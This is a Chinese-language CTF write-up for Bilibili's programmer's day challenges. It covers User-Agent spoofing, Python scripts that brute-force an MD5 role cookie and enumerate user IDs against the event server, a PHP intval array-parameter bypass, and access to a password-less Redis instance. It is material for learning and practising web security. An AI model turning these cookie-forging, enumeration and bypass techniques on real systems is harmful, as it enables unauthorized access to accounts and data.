哔哩哔哩的程序员节CTF
0x00
序号从1开始…跳过
0x01 & 0x02
审查源码之后可以看到`
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| <script>
$.ajax({
url: "api/admin",
type: "get",
success:function (data) {
if (data.code == 200){
var input = document.getElementById("flag1");
input.value = String(data.data);
} else {
$('#flag1').html("接口异常,请稍后再试~");
}
}
})
</script>
<script>
$.ajax({
url: "api/ctf/2",
type: "get",
success:function (data) {
if (data.code == 200){
$('#flag2').html("flag2: " + data.data);
} else {
$('#flag2').html("需要使用bilibili Security Browser浏览器访问~");
}
}
})
</script>
|
首先访问http://45.113.201.36/api/admin, 完成签到.
然后访问http://45.113.201.36/api/ctf/2, 抓包后修改header中的UA为bilibili Security Browser, 拿到flag.
0x03
查看html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| <script>
$("#submit").click(function(){
$.ajax({
url: "api/ctf/3",
type: "post",
contentType: "application/json",
dataType:"json",
data: JSON.stringify({
username: $("#name").val(),
passwd: $("#subject").val(),
}),
success:function (data) {
if (data.code == 200){
alert("flag is: " + data.data);
} else {
alert("用户名或密码错误~");
}
}
})
});
</script>
|
好像没啥问题, 尝试最基础的sqli...
几种注入都不对…放弃
答案是admin/bilibili
0x04
抓包发现
1
2
3
4
5
6
7
8
9
10
| GET /api/ctf/4 HTTP/1.1
Host: 45.113.201.36
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://45.113.201.36/superadmin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: session=eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54; role=ee11cbb19052e40b07aac0ca060c23ee
Connection: close
|
百度可知:
1
2
| In [2]: md5("user".encode("utf8")).hexdigest()
Out[2]: 'ee11cbb19052e40b07aac0ca060c23ee'
|
接下来尝试各种role的md5…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| import requests
from hashlib import md5
def send_payload(payload):
cookies = {
'session': 'seeeeeeeeeeeeeeeession',
'role': md5(payload.encode("utf8")).hexdigest(),
}
headers = {
'Proxy-Connection': 'keep-alive',
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://45.113.201.36/superadmin.html',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}
response = requests.get('http://45.113.201.36/api/ctf/4', headers=headers, cookies=cookies, verify=False)
return response
fuzz_list = [
"admin",
"superadmin",
"SuperAdmin",
"bilibili",
"root",
"管理员",
"超级管理员",
"chaojiguanliyuan",
"bilibiliadmin",
"bilibilisuperadmin",
"supervisor",
"administrator",
"superadministrator",
"chenrui",
]
fuzz_list.extend([s.capitalize() for s in fuzz_list])
for f in fuzz_list:
r = send_payload(f)
print(f"{f:>18}", r.text)
|
得到
1
2
| Administrator {"code":200,"data":"flag","msg":""}
|
好耶!
0x05
审查代码环节:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| $(function () {
(function ($) {
$.getUrlParam = function(name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return unescape(r[2]); return null;
}
})(jQuery);
var uid = $.getUrlParam('uid');
if (uid == null) {
uid = 100336889;
}
$.ajax({
url: "api/ctf/5?uid=" + uid,
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
$('#flag').html("欢迎超级管理员登陆~flag : " + data.data )
} else {
$('#flag').html("这里没有你想要的答案~")
}
}
})
});
|
审查不出目标uid是多少, 盲打试试看
稍微修改上面的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| def send_payload(payload):
cookies = {
'session': 'eyJ1aWQiOiIyNjE4MjIifQ.X5Obkg.djkuPlz_wwtba7F-BHsM4lL7W54',
}
headers = {
'Proxy-Connection': 'keep-alive',
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://45.113.201.36/superadmin.html',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}
response = requests.get('http://45.113.201.36/api/ctf/5?uid={}'.format(payload), headers=headers, cookies=cookies, verify=False)
return response
for f in range(100336889, 100336889 + 10000):
r = send_payload(f)
rj = r.json()
if rj["data"]:
print(f"{f:>5}",rj)
print(finish)
|
等待结果即可
0x06
代码没什么可以审查的地方…
网页名字叫Black & White, 所有可以输入的地方只有email需要validation. 猜测是不是这里有xss.
构建payload
构建个鬼啦…
拿御剑扫, 能扫到test.php和end.php两个目录
进入test.php 得到一个js fucker编码的东西, 丢进去可以得到
1
2
3
| var str1 = "\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9";
var str2 = "bilibili1024havefun";
console.log()
|
1
2
| "\u7a0b\u5e8f\u5458\u6700\u591a\u7684\u5730\u65b9"
"程序员最多的地方"
|
好了, 去gayhub搜索bilibili1024havefun, 可以看到end.php的源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
<?php
$bilibili = "bilibili1024havefun";
$str = intval($_GET['id']);
$reg = preg_match('/\d/is', $_GET['id']);
if(!is_numeric($_GET['id']) and $reg !== 1 and $str === 1){
$content = file_get_contents($_GET['url']);
if (false){
echo "还差一点点啦~";
}else{
echo $flag;
}
}else{
echo "你想要的不在这儿~";
}
?>
|
传入id参数, 要求参数不含数字, 又能被intval解析为1, 查看php文档
1
2
| echo intval(array())
echo intval(array('foo', 'bar'))
|
尝试构造payload: id[]=1&id[]=2
接下来猜解路径为/api/ctf/6/flag.txt (别问我怎么猜的, 盘外招也是CTF的一环)
得到flag文件bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg
按照txt文件打开得到…{flag10:2ebd3b08-47ffc478-b49a5f9d-f6099d65}
第十题的flag.
炸裂
0x07
从第七题开始会得到这样的提示, 并且没有题目:
需要少年自己去探索啦~
哦.
据说后面四题的答案全都在第六题里, 懵了.
0x08
扫第六题的IP的端口能扫出一个redis, 连进去, 没密码, flag8, 搞定.
0x09
不知是啥
0x10
第六题中已经无意中摸到了